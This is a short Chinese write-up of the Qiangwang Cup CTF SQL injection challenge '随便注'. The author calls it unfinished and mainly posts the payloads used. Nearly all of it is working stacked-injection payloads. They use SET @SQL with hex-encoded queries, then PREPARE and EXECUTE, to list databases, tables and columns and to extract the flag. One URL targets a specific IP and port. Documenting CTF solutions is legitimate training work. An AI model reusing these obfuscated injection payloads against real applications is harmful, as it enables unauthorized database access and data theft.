强网杯SQL注入 “随便注” WriteUP

本文累计 1549 字, 最后更新时间：2022年01月09日

### 0x00
说在前面：
本题解距离当时比赛有一段时间了，属于题目补档计划，因此先在这里埋个坑。
后面我会把题目环境整理复现出来，到时候补完本题解，
这里先贴一下当时用到的Payload.

### 0x01 正文
**考点备注:**
PDO预处理+堆叠注入

/?inject=1';SET+@SQL=
    0x73656c656374206966282873656c65637420636f756e7428736368656d615f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e736368656d617461293d322c312c65787028313032342929;PREPARE+pord+FROM+@SQL;EXECUTE+pord;+--+a

查库

http://117.78.37.77:31954/?inject=1';SET+@SQL=
    0x53454c4543542067726f75705f636f6e63617428736368656d615f6e616d65292c322046524f4d20696e666f726d6174696f6e5f736368656d612e736368656d617461
    ;PREPARE+pord+FROM+@SQL;EXECUTE+pord;+--+a

![Image.png][1]
查表

0x53454C4543542067726F75705F636F6E636174287461626C655F6E616D65292C322046524F4D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D613D22737570657273716C6922

![Image.png][2]
查字段

0x53454C4543542067726F75705F636F6E63617428636F6C756D6E5F6E616D65292C322066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F736368656D613D22737570657273716C692220616E64207461626C655F6E616D653D223139313938313039333131313435313422

![Image.png][3]
出数据

0x53454C45435420666C61672C322046524F4D20737570657273716C692E31393139383130393331313134353134

![Image.png][4]

[1]: https://hack.best/usr/uploads/2022/01/4115139669.png
  [2]: https://hack.best/usr/uploads/2022/01/2366463792.png
  [3]: https://hack.best/usr/uploads/2022/01/1062613787.png
  [4]: https://hack.best/usr/uploads/2022/01/838299294.png